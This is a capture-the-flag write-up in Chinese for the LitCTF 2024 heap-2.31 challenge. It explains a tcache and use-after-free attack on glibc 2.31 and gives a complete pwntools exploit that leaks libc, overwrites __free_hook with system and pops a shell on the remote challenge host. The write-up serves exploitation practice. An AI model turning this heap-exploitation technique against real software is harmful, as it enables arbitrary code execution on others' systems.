[LitCTF 2024]heap-2.31
Problem: [LitCTF 2024]heap-2.31
思路
填满tacahe,利用unsortbin泄漏出free_hook,利用uaf修改tacahe的fd实现任意内存地址读写,劫持free_hook
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
elf = ELF('./heap')
lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#io = gdb.debug('./heap')
io = remote('node4.anna.nssctf.cn',28242)
def create(idx,size):
io.sendlineafter(b'>>',str(1))
io.sendlineafter(b'idx?',str(idx))
io.sendlineafter(b'size?',str(size))
def delete(idx):
io.sendlineafter(b'>>',str(2))
io.sendlineafter(b'idx?',str(idx))
def show(idx):
io.sendlineafter(b'>>',str(3))
io.sendlineafter(b'idx?',str(idx))
def edit(idx,content):
io.sendlineafter(b'>>',str(4))
io.sendlineafter(b'idx?',str(idx))
io.sendlineafter(b'content : \n',content)
for i in range(9):
create(i,0x88)
for i in range(8):
delete(i)
show(7)
free_hook = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))+0x2268
log.info(hex(free_hook))
lib_base = free_hook-lib.sym['__free_hook']
sys_addr = lib_base+lib.sym['system']
edit(5,p64(free_hook))
[create(i,0x88)for i in range(10,13)]
edit(12,p64(sys_addr))
edit(8,b'/bin/sh\x00')
delete(8)
io.interactive()
总结
要注意tacahe利用uaf修改为free_hook地址时,不能使用最末尾(第七个)的块,那样会导致无法申请,出现脱链的状况。
This post is licensed under CC BY 4.0 by the author.